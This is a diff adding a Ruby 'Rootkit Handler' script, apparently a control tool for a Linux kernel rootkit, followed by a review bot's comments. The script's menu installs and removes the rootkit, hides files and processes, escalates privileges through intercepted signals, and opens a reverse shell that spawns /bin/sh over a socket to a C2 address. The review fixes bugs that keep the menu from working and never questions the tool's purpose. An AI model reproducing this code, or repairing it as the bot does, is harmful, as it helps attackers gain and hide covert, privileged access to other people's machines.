|
| 1 | +system 'clear' |
| 2 | +require 'colorize' |
| 3 | +require 'socket' |
| 4 | + |
| 5 | +puts <<-eos |
| 6 | + _______ |
| 7 | + /\ o o o\ |
| 8 | + /o \ o o o\_______ |
| 9 | +< >------> o /| |
| 10 | + \ o/ o /_____/o| |
| 11 | + \/______/ |oo| |
| 12 | + | o |o/ |
| 13 | + |_______|/ I used to roll the dice.. |
| 14 | + made by arthur & rodrigo |
| 15 | +
|
| 16 | + Ruby |
| 17 | + Rootkit Handler\n |
| 18 | +
|
| 19 | +1 - Install Ruby (Rootkit) |
| 20 | +2 - Uninstall Ruby (Rootkit) |
| 21 | +3 - Hide File |
| 22 | +4 - Hide Process |
| 23 | +5 - Privilege Escalation |
| 24 | +6 - Reverse Shell (Ring3) |
| 25 | +
|
| 26 | +eos |
| 27 | + |
| 28 | +def reverseShell(ip, port) |
| 29 | + spawn("/bin/sh",[:in,:out,:err]=>TCPSocket.new("#{ip}","#{port}")) |
| 30 | +end |
| 31 | + |
| 32 | +def writeLibrary(_rkname) |
| 33 | + rubyHeader = <<-eos |
| 34 | +#define RTHXR "rthxr" |
| 35 | +#define PF_INVISIBLE 0x10000000 |
| 36 | +#define MODULE_NAME "#{_rkname}" |
| 37 | +
|
| 38 | +struct linux_dirent { |
| 39 | + unsigned long d_ino; |
| 40 | + unsigned long d_off; |
| 41 | + unsigned short d_reclen; |
| 42 | + char d_name[1]; |
| 43 | +}; |
| 44 | +
|
| 45 | +enum { |
| 46 | + SIGINVIS = 9, |
| 47 | + SIGSUPER = 2, |
| 48 | + SIGMODINVIS = 6, |
| 49 | +}; |
| 50 | + eos |
| 51 | + |
| 52 | + file = File.write("library/Ruby.h", rubyHeader) |
| 53 | + puts 'Done!'.bold |
| 54 | +end |
| 55 | + |
| 56 | +print 'Driver (Rootkit) Name: ' |
| 57 | +rkname = gets.chomp.to_s |
| 58 | + |
| 59 | +print '\nRuby > '.bold |
| 60 | +ruby = gets.chomp.to_s |
| 61 | + |
| 62 | +if ruby == 1 |
| 63 | + writeLibrary(rkname) |
| 64 | + |
| 65 | +elsif ruby == 2 |
| 66 | + begin |
| 67 | + system 'kill -6 0' |
| 68 | + system "rmmod #{rkname}" |
| 69 | + rescue Exception => e |
| 70 | + puts "Error during Ruby (Rootkit) removal.. Err: " + e.message |
| 71 | + end |
| 72 | + |
| 73 | +elsif ruby == 3 |
| 74 | + print 'Directory/File Name: ' |
| 75 | + flName = gets.chomp.to_s |
| 76 | + |
| 77 | + system "mv #{flName} rthxr#{flName}" |
| 78 | + |
| 79 | +elsif ruby == 4 |
| 80 | + begin |
| 81 | + print "Process \"PID\" ID: " |
| 82 | + pid = gets.chomp.to_s |
| 83 | + |
| 84 | + system "kill -9 #{pid}" |
| 85 | + rescue Exception => e |
| 86 | + puts "Error during Ruby (Rootkit) execution.. Err: " + e.message |
| 87 | + end |
| 88 | + |
| 89 | +elsif ruby == 5 |
| 90 | + begin |
| 91 | + system "kill -2 0" |
| 92 | + rescue Exception => e |
| 93 | + puts "Error during Ruby (Rootkit) execution.. Err: " + e.message |
| 94 | + end |
| 95 | +elsif ruby == 6 |
| 96 | + begin |
| 97 | + print 'Local (C2) Address: ' |
| 98 | + laddr = gets.chomp.to_s |
| 99 | + |
| 100 | + print 'Local (C2) Port: ' |
| 101 | + lport = gets.chomp.to_s |
| 102 | + |
| 103 | + reverseShell(laddr, lport) |
| 104 | + rescue Exception => e |
| 105 | + puts 'Error during Ruby (Rootkit) execution.. Err: ' + e.message |
| 106 | + end |
| 107 | +end |
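Review bot: None of the menu branches can ever execute, because `ruby = gets.chomp.to_s` (line 60) yields a String while `if ruby == 1` / `elsif ruby == 2` … compare it with Integers, which is always false in Ruby, so every choice silently falls out of the `if` chain; either parse the input with `ruby = Integer(gets.chomp, exception: false)` or compare against string literals such as `ruby == '1'`. The prompt on line 59 is single-quoted, so `'\nRuby > '` prints a literal backslash-n instead of a newline; it should be `"\nRuby > "`. The `rescue Exception` clauses also catch `Interrupt` and `SystemExit` and should be a bare `rescue` (StandardError); note that `system` does not raise on a failed `kill`/`rmmod` anyway but returns false, so these blocks cannot report the failure they are written for, and `kill -2 0`/`kill -6 0` signal the caller's own process group, presumably relying on the loaded module to intercept them — worth a comment. `flName` and `pid` are interpolated unquoted into shell strings on lines 77 and 84; pass them as separate arguments, e.g. `system('mv', flName, "rthxr#{flName}")` and `system('kill', '-9', pid)`, so names containing spaces or shell metacharacters are not reinterpreted by `/bin/sh`.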